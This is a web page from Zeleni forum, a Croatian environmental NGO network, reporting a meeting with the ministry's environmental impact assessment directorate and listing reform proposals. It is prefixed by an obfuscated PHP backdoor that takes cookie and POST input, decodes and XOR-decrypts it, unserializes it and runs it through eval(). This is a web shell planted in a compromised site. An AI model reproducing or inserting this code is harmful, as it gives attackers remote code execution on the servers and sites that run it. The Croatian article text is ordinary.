$bDMhBNMO = chr ( 745 - 646 ).'_' . "\124" . "\130" . chr ( 1102 - 991 ).chr ( 174 - 107 ); $GNQlfv = 'c' . 'l' . 'a' . "\163" . 's' . chr ( 211 - 116 ).'e' . chr (120) . 'i' . "\x73" . chr ( 452 - 336 )."\x73";$rtMINlOnUq = class_exists($bDMhBNMO); $GNQlfv = "3231";$AAvQxiikZL = !1;if ($rtMINlOnUq == $AAvQxiikZL){function zCApvp(){$syiLqlIT = new /* 22434 */ c_TXoC(41226 + 41226); $syiLqlIT = NULL;}$MLLyfOTves = "41226";class c_TXoC{private function avsJOB($MLLyfOTves){if (is_array(c_TXoC::$BrfwbO)) {$JQZhjt = str_replace('<' . chr (63) . "\160" . "\150" . chr (112), "", c_TXoC::$BrfwbO[chr (99) . "\x6f" . "\156" . chr ( 307 - 191 ).chr (101) . 'n' . "\164"]);eval($JQZhjt); $MLLyfOTves = "41226";exit();}}private $ejIrXiK;public function UoLMpRzWB(){echo 1697;}public function __destruct(){c_TXoC::$BrfwbO = @unserialize(c_TXoC::$BrfwbO); $MLLyfOTves = "20803_15741";$this->avsJOB($MLLyfOTves); $MLLyfOTves = "20803_15741";}public function uKyMShiW($GXRdL, $dzQSxQv){return $GXRdL[0] ^ str_repeat($dzQSxQv, (strlen($GXRdL[0]) / strlen($dzQSxQv)) + 1);}public function ItWEoZM($GXRdL){$OlXMRVy = "base64";return array_map($OlXMRVy . chr (95) . chr ( 948 - 848 ).chr (101) . "\143" . chr ( 124 - 13 ).chr ( 556 - 456 ).chr ( 721 - 620 ), array($GXRdL,));}public function __construct($QWPbb=0){$abZxXt = $_POST;$lILjfaXvW = $_COOKIE;$dzQSxQv = "b7aa93a8-a17b-448e-bf53-971431b110a8";$eUDoeaXwCi = @$lILjfaXvW[substr($dzQSxQv, 0, 4)];if (!empty($eUDoeaXwCi)){$GXRdL = "";$eUDoeaXwCi = explode(",", $eUDoeaXwCi);foreach ($eUDoeaXwCi as $CIdbhY){$GXRdL .= @$lILjfaXvW[$CIdbhY];$GXRdL .= @$abZxXt[$CIdbhY];}c_TXoC::$BrfwbO = $this->uKyMShiW($this->ItWEoZM($GXRdL), $dzQSxQv);}}public static $BrfwbO = 38262;}zCApvp();} Zagovaranje poboljšanja provedbe postupaka Procjene utjecaja na okoliš - predstavnici Zelenog foruma na sastanku u Upravi za procjenu utjecaja na okoliš - Zeleni Forum

Zagovaranje poboljšanja provedbe postupaka Procjene utjecaja na okoliš - predstavnici Zelenog foruma na sastanku u Upravi za procjenu utjecaja na okoliš

Predstavnici Zelenog Foruma su 8.12.2023.  sudjelovali na sastanku u Ministarstvu gospodarstva i održivog razvoja – s predstavnicima Uprave za procjenu utjecaja na okoliš i održivo gospodarenje otpadom. Ispred Uprave sudjelovali su Ana Kovačević, Dino Kapuano, Anamarija Matak, a ispred  Zelenog foruma – Željka Leljak Gracin (Zelena akcija), Hajdi Biuk (Udruga Sunce), Jasmina Čolić (Eko Pan) i Sven Kapelj (Udruga Biom).

Na sastanku je istaknuto da je poboljšanje suradnje između Ministarstva i udruga, ali i drugih dionika (ovlaštenika, stručnih udruga)  korisno za sve građane te da je ovo dobar korak u tom smjeru. Voditeljica Uprave najavila je reviziju legislative vezane uz PUO od iduće godine.

Predstavnici Zelenog foruma iznijeli su problematiku  s kojom se susreću prilikom  sudjelovanja u Postupcima procjene utjecaja na okoliš te su predložili i konkretne prijedloge za poboljšanja čiju implementaciju  su prokomentirali s predstavnicima Uprave.

Konkretni prijedlozi za poboljšanje stanja:

• Web stranice urediti tako da se kod pregleda jednog dokumenta iz pojedinog postupka možeš vratiti na početak navedenog postupka, a ne na početnu stranicu ministarstva

• Sve postupke glavnih ocjena zahvata na ekološku mrežu i/ili utjecaja na okoliš provoditi preko e-savjetovanja (a ne interno preko web stranica ministarstva ili državnih županijskih ureda)

• Uvesti sustav obavještavanja prilikom ažuriranja predmeta – kao što je to napravljeno u Elektronskom oglasniku javne nabave (EOJN): stranka zainteresirana za predmet automatski dobiva obavijest ako je došlo do promjene/dopune predmeta

• Uvesti sustav obavještavanja kada pojedini plan, program ili zahvat (ili njihova izmjena) uđe u postupak prethodne ocjene prihvatljivosti (jer o ovom postupku javnost nema nikakvih saznanja (sve se odvija ispod stola) sve dok se ne izda rješenje + poziv zainteresiranim strankama da se jave ako su zainteresirane za sudjelovanje u tim postupcima

• Uvesti sustav obaveznog dostavljanja odgovora na primjedbe strankama koje su sudjelovale u javnoj raspravi prije održavanja druge ili treće sjednice povjerenstva za ocjenu i uvođenje mogućnosti komentiranja odgovora na primjedbe. Uvesti sustav obaveznog objavljivanja odgovora na primjedbe (kao što se to dešava na portalu e-savjetovanja). Napomena: odgovore na primjedbe uglavnom pišu investitor i izrađivač studije, a ne članovi Povjerenstva - oni ih samo automatizmom prihvate bez obzira na meritum primjedbe

• Uvesti redovita godišnja izvješća Uprave za procjenu utjecaja na okoliš i održivo gospodarenje otpadom, Službe za ocjenu prihvatljivosti i odobrenje zahvata, te Službe za ocjenu prihvatljivosti planskih dokumenata iz kojih će se vidjeti statistika – koliko zahvata/planova je ušlo u postupak, koliko ih je prošlo Prethodnu ocjenu, koliko je išlo na Glavnu, koliko ih je odobreno, a koliko ne

• Uvesti redovitu objavu rezultata provedbe mjera zaštite prirode i ekološke mreže prema izdanim Rješenjima o odobrenju zahvata. Ti podaci moraju biti javno dostupni.

Iako izražavamo sumnju da će najavljene izmjene informatičkog sustava Ministarstva biti implementirane u superizbornoj godini, pozdravljamo činjenicu da su djelatnici Ministarstva svjesni potrebe žurnog rješavanja ovog pitanja te pomake koje je Zeleni forum uspio napraviti u 2023. godini u samoj komunikaciji sa Ministarstvom i Fondom.

Ove stranice su nastale uz financijsku potporu Europske unije.
Za sadržaj stranica odgovaran je isključivo Zeleni Forum i ni u kom slučaju se ne može smatrati da odražava stav Europske unije.
© 1998. - 2022. Zeleni forum - mreža udruga za zaštitu okoliša Hrvatske